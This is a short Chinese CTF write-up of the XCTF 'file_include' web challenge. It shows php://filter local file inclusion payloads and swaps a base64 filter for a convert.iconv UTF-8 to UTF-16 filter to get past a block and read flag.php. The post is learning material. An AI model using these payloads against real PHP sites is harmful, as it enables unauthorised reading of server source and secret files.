CTFer成长记录——CTF之Web专题·攻防世界—file_include

发布时间 2023-07-31 15:00:23作者: MiracleWolf

一、题目链接

https://adworld.xctf.org.cn/challenges/list

二、解法步骤

  本题依然是文件包含,那么构造paylaod:?filename=php://filter/read=convert.base64-encode/resource=flag.php

  

  发现存在过滤,事实上read=convert.base64是编码转换过滤器,它可以有其他的替代形式:convert.iconv.<input-encoding>.<output-encoding>,<input_encodning>就是输入编码,<output-encoding>就是输出解码,这里我们填写utf-8,utf-16:convert.iconv.utf-8.utf-16,那么对应的payload更改为:?filename=php://filter/convert.iconv.UTF-8.UTF-16/resource=flag.php:得到flag:

三、总结

  本题又是一个file_include的小改编,通过此题可以知道更多的filter过滤器的写法。